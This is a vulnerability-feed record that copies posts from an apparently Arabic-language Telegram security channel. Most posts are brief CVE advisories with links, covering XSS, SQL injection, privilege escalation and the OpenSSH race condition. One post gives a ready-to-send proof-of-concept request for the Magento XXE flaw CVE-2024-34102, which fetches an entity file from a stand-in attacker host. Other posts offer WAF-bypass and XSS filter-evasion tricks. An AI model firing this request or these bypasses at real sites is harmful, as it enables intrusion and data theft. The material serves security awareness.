{"uuid": "2ffdd8a6-7beb-4be3-8b32-99e34fb313f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "https://t.me/cyber_hsecurity/1608", "content": ":\n\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 wanEditor v4.7.11 \u0648\u062a\u0645 \u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u064a\u0646 v.4.7.12 \u0648v.5\u060c \u0648\u0647\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0646\u0635\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (XSS) \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0648\u0631.\n\nhttps://gist.github.com/Mdxjj/5cf0a31e8abf24ed688ceb5b3543516d\n\n\u0647\u0646\u0627\u0643 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a Debezium Community debezium-ui v.2.5 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0635\u0641\u062d\u0629.\n\nhttps://packetstormsecurity.com/files/178794/Debezium-UI-2.5-Credential-Disclosure.html\n\n\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d IBM Security Verify Access Docker 10.0.0 \u062d\u062a\u0649 10.0.6 \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u0628\u0633\u0628\u0628 \u0627\u0644\u062a\u062d\u0642\u0642 \u063a\u064a\u0631 \u0627\u0644\u0635\u062d\u064a\u062d \u0645\u0646 \u0627\u0644\u0634\u0647\u0627\u062f\u0629. \u0645\u0639\u0631\u0641 IBM X-Force: 292416.\n\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/292416\n\n\u064a\u0632\u064a\u0644 javascript-deobfuscator \u062a\u0642\u0646\u064a\u0627\u062a \u062a\u0634\u0648\u064a\u0634 JavaScript \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0623\u062b\u0631\u0629\u060c \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a \u0627\u0644\u0645\u0639\u062f\u0629 \u0648\u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631 \u0625\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629. \u0644\u0642\u062f \u062a\u0645 \u062a\u0635\u062d\u064a\u062d \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 1.1.0. \u064a\u064f\u0646\u0635\u062d \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u064a\u062c\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u063a\u064a\u0631 \u0627\u0644\u0642\u0627\u062f\u0631\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062a\u0631\u0642\u064a\u0629 \u062a\u0639\u0637\u064a\u0644 \u0645\u064a\u0632\u0629 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631.\n\nhttps://github.com/ben-sb/javascript-deobfuscator/commit/630d3caec83d5f31c5f7a07e6fadf613d06699d6\n\n\u062d\u0633\u064a\u0646 \u0631\u0648\u0632\u0643\u0627\u0631:\nCVE-2024-36684\nCRITICAL\nInformation\nCPEs\nPlugins\nDescription\nIn the module \"Custom links\" (pk_customlinks) &lt;= 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.\nReferences\nhttps://security.friendsofpresta.org/modules/2024/06/18/pk_customlinks.html\n\nALSED404:\npayload\n\n\n\n\n\n#Payload\n===================================\n#ALSED404\n\nCVE-2024-34102\u00a0 POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\nXSS WAF Bypass by multi-char HTML entities\n\n&fjlig; translates to fj\n&nvgt; translates to &gt; + [?]\n&nvlt; translates to &lt; + [?]\n\n[?] - Unicode symbol\n\n#BugBounty #Tips\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\n\u0647\u0627 \u062c\u0645\u0627\u0639\u0629 \u0627\u0644\u0627\u064a\u0641\u0648\u0646 \ud83d\ude02\ud83d\ude02\ud83d\ude02\ud83d\ude02\n\ud83d\udd12 \u0645\u0637\u0648\u0631\u064a iOS \u0648macOS\u060c \u062a\u0646\u0628\u064a\u0647!\n\n\u0627\u0643\u062a\u0634\u0641 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a 3 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u062c\u062f\u064a\u062f\u0629 \u0641\u064a CocoaPods\u060c \u0625\u062d\u062f\u0649 \u0623\u062f\u0648\u0627\u062a \u0645\u0637\u0648\u0631\u064a Apple \u0627\u0644\u0634\u0647\u064a\u0631\u0629\u060c \u0625\u0644\u0649 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0639\u0644\u0649 \u062a\u0637\u0628\u064a\u0642\u0627\u062a iOS \u0648macOS.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0647\u0646\u0627: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html\n#ALSED404\n\nPayload XSS: \n\n\n#Payload #XSS\n===================================\n#ALSED404\n\nDiscovered an XSS vulnerability but Imperva WAF blocked it?\nTry this XSS payload to bypass Imperva's protection.\n\n\n\n\n#BugBounty #Bypass_Imperva #Payload #XSS\n===================================\n#ALSED404\n\n\u062b\u063a\u0631\u0629 \u062c\u062f\u064a\u062f\u0629 \u0628\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 OpenSSH \u062a\u0646\u0637\u064a RCE \n\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 &amp; 8.8p1, allowing RCE via race condition in privsep child process. \n\nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n\n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.\n#ALSED404", "creation_timestamp": "2024-12-13T19:00:21.000000Z"}